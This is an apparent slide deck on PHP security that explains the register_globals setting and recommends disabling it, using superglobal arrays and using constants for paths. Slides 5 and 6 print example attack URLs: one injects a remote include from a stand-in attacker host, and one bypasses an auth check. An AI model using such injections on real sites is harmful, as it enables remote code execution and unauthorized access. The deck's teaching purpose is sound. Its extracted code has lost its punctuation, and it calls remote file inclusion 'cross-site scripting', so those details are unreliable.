PHP Security: register_globals

1
PHP Security register_globals

• How To Make It Difficult For Hackers To Set
  Variables

2
What Is register_globals?

• A directive in php.ini to automatically make
  variables out of environment, GET, POST, cookies,
  and server data (true/false)
• C.f. variables_order (EGPCS)

3
Examples (Part 1)
ltform gt ltinput typetext namemytext
/gt ltinput typehidden namemyhide
valueother /gt lt/formgt With register_globals
turned on, PHP will automatically create
variables mytext and myhide and populate them
with the values entered in the form (whether GET
or POST).
4
Examples (Part 2)

• Similarly, with the URL
• http//example.com/index.php?georgejungle
• PHP will create george for you and give it the
  value jungle.
• Cookie, server, and environment variables such as
  DOCUMENT_ROOT and PHP_SELF are also
  automatically created and populated.
• You dont know where the values came from (EGPCS).

5
Problems (Part 1)
lt?php // some code include libdir/functions.i
nc // more code ?gt If user sets libdir in
the URL, it can override your libdir value,
allowing cross-site scripting.
E.g. http//example.com/index.php?libdirhttp//
badguy.se/hack
6
Problems (Part 2)
lt?php if (auth 1) // do stuff for
authorized users else echo Not
authorized! ?gt If user sets auth in the
URL, it can override your auth value, allowing
unauthenticated use. E.g. http//example.com/in
dex.php?auth1
7
Solutions (Part 1)

• Dont let anyone see your code
• If they dont know what variables to set, they
  cant crack your script!
• Security-through-obscurity
• Does not work well, if at all
• Check all variables before using them
• Good practice anyway
• Sometimes hard to check (e.g., auth)

8
Solutions (Part 2)

• Turn off register_globals!
• Off by default in PHP 4.2.0 and later anyway
• Use the track_vars arrays instead
• _GET
• _POST
• _SERVER
• _FILES
• _ENV
• _COOKIE
• Turned on by default in PHP 4.0.3 and later

9
Solution Examples (Part 1)
ltform methodpostgt ltinput typetext
namemytext /gt ltinput typehidden
namemyhide valueother /gt lt/formgt With
register_globals turned off, PHP will populate
_POSTmytext and _POSTmyhide. If the
method was GET, the values are in _GET.
10
Solution Examples (Part 2)
If a value is set in the URL http//example.com/i
ndex.php?georgejungle it becomes
_GETgeorge jungle Post-method variables
are in _POST Get-method and URL variables are in
_GET Server variables are in _SERVER Uploaded
files are in _FILES Cookie values in
_COOKIE Environment settings in _ENV You know
exactly where values are set from.
11
Use define For Path Names

• If you you have to set directory paths in
  variables, use constants instead
• define(LIBDIR, /path/to/lib)
• Pathnames are especially dangerous in variables
  since they can lead directly to cross-site
  scripting security issues
• Once set, constants cannot be redefined, making
  them far more secure against accidental or
  unexpected value resets and hack attempts

12
References

• http//www.php.net/manual/en/security.registerglob
  als.php
• http//www.php.net/manual/en/security.php
• http//www.zend.com/zend/art/art-oertli.php
• http//www.securereality.com.au/studyinscarlet.txt